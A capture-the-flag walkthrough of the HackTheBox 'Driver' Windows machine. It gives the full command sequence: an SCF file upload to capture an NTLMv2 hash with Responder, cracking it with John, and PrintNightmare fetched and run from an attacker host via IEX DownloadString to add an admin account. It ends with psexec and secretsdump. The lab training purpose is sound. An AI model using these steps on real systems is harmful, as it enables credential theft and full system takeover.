Driver HackTheBox WalkThrough
This is Driver HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted
Driver HTB machine. Before starting let us know something about this machine. It is a
Windows OS box with IP address
10.10.11.106 and difficulty
easy assigned by its maker.
First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with
Driver machine by pinging its IP 10.10.11.106. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine.
Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used
$ nmap for this task and the result is given below: –
$ sudo nmap -p- --min-rate 10000 -oN nmap-alltcp.nmap 10.10.11.106
$ sudo nmap -p 80,135,445,5985 -sV -sC -oA nmap-tcpscripts.nmap 10.10.11.106
Full port scan with
$ nmap revealed 4 ports as open.
Microsoft IIS 10.0 web server is running over port
80. Since version of web server software is
10.0 which is the latest one so there is no any potential vulnerability present in it.
Msrpc is running on port
SMB service is running on port
Microsoft HTTPAPI service is running over port
5985. Since port 5985 is open, we can connect to driver machine remotely using this port once we get any user credential because this port is used for Remote Management in windows OS.
I began my enumeration from port 445. Tried to establish
null session on port
445 but got
ACCESS_DENIED message. Then on going to URL http://10.10.11.106 found a login page. Just tried some default credential like
admin and it worked. Logged in successfully into the website. It is a
Firmware Update Center where user upload their firmware and the uploaded file is tested by driver testing team. One thing is clear by this line is that, whenever we will upload any file to this site that will be opened by the testing team.
But before going further let us add
driver.htb to out
hosts. Hosts file is present in the directory
Hosts File After Modification
$ cat /etc/hosts
Ongoing to the URL http://driver.htb/fw_up.php found a file upload functionality. Since the application is made up of
php I tried to upload a
php web shell but it did not execute. Tried to upload other extension files like
asp, etc., but none of them execute. Performed
directory bruteforce on URL http://driver.htb and nothing useful found. After some googling found that we can perform
SCF File Attacks when SMB port is open and file share are available. For more info about this attack check this blog post at PentestLab. To perform
SCF File Attack follow the given steps:
1. Firstly create a file with the following contents and save the file starting with
@ (adding the @ symbol in front of the filename will place the
share.scf on the top of the share drive) with
.scf file extension (don’t forget to replace IP address with your tun0 IP in below code).
[Shell] Command=2 IconFile=\\10.10.17.97\info.ico [Taskbar] Command=ToggleDesktop
$ cat @share.scf
$ responder to listen on your
$ sudo responder -wrf --lm -v -I tun0
3. At last upload
@share.scf file at http://driver.htb/fw_up.php.
Since our uploaded file is opened by driver user so when it opens
@share.scf it tries to connect to SMB share at IP
10.10.17.97 (my local IP) to access info.ico file. As there is no any file share present at my local IP,
$ responder will respond to the authentication request made by driver user and will prove itself that it is the SMB server which driver user is trying to connect. During authentication responder will capture the authentication hash and dump on the screen. I tried to follow all the above steps and got
We can again confirm the type of hash using
$ hashid tool.
Identifying the Hash
$ hashid 'tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000'
Let us crack the hash using
John the Ripper [an offline password cracker] tool. You can also use other offline cracker like
Cheat sheet of John can be found at Pentestmonkey.
$ echo "tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000" > hash.txt
$ john --format=netntlmv2 hash.txt /usr/share/wordlists/rockyou.txt
$ john --format=netntlmv2 hash.txt /usr/share/wordlists/rockyou.txt –show
The cracked hash is
liltony. So, we have the credential
liltony. Since port
5985 is open we can use
evil-winrm to remotely connect to driver machine using this credential. Let us connect and get user shell.
Getting User Shell
$ evil-winrm -u'tony' -p'liltony' -P5985 -i 10.10.11.106
We have successfully connected to Driver machine. Let us capture user flag.
Capture User Flag
$ type C:\Users\tony\Desktop\user.txt
To escalate the privilege to admin we have to first find a privilege escalation vector using which we can perform privilege escalation. We can use some post exploitation enumeration script for finding PrivEsc vector. Check this link if you need more information about a bunch of post exploitation tools.
Finding PrivEsc Vector
I have used
winpeas this time. It is the best
Post Exploitation Enumeration tool which can be found at this repo. Before we run
winpeas on driver machine we need to first transfer it from our Kali machine to driver machine. Follow below steps to run winpeas on driver machine.
On Kali Machine
$ wget https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx64.exe
$ python3 -m http.server 9001
On Driver Machine
$ cd C:\Temp\
$ certutil.exe -urlcache -split -f "http://10.10.17.97:9001/winPEASx64.exe" winPEASx64.exe
spoolsv service is running locally. For more info about this service check this article.
spoolsv service is related to printer and the name of this HTB box is
Driver this remind me about the
Windows Print Spooler Remote Code Execution Vulnerability whose patch was released by Microsoft on 1st July 2021. The name of the exploit was
PrintNightmare which can be used to perform Remote Code Execution on windows OS running Windows 10, Windows Server 2016 and almost all versions were vulnerable. Check the complete information about this vulnerability on Microsoft site. A very good article on how to exploit this vulnerability is written by 0xdf. Check this article by him.
When I tried to exploit this vulnerability, I could easily get admin shell. So here our potential privilege escalation vector is
Privilege Escalation via Vulnerable Service Version.
Note: This exploit will work only if spoolsv service is running otherwise it will give error something like “Failed to get current driver lists”. If you don’t see spoolsv service then you need to reset the machine.
You can also use command
$ ps | findstr "spoolsv" to find the spoolsv service.
Performing Privilege Escalation
To perform privilege escalation and getting admin shell follow the given steps.
On Kali Machine
$ git clone https://github.com/calebstewart/CVE-2021-1675
$ cd CVE-2021-1675/
$ echo "Invoke-Nightmare -NewUser 'newadmin' -NewPassword 'SuperSecurePassword'">>CVE-2021-1675.ps1
$ python3 -m http.server 9001
On Driver Machine
$ IEX(New-Object Net.WebClient).DownloadString("http://10.10.17.97:9001/CVE-2021-1675.ps1")
The above exploit will add a new user
newadmin with password
SuperSecurePassword and also adds this user to
local admin group. We can check the list of all the admin accounts in Administrators group using the following command.
$ net localgroup administrators
Getting Admin Shell
Since we have admin credential therefore, we can now access the
SMB shares which is present at port 445 and also have write permission on
$C drive of Driver machine. Now we can use
psexec.py module of
Impacket to get admin shell.
PsExec is a remote managing tool similar as SSH in Linux. Since port 5985 is open so we can also use
$ evil-winrm using the credential
SuperSecurePassword to connect to Driver machine.
$ impacket-psexec [email protected]
NT Authority\System now let us grab root flag.
Capture Root Flag
$ type C:\Users\Administrator\Desktop\root.txt
Dumping Admin Hash
$ impacket-secretsdump [email protected]
This was how I rooted Driver HackTheBox machine. Learnt a lot after solving this box. Hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].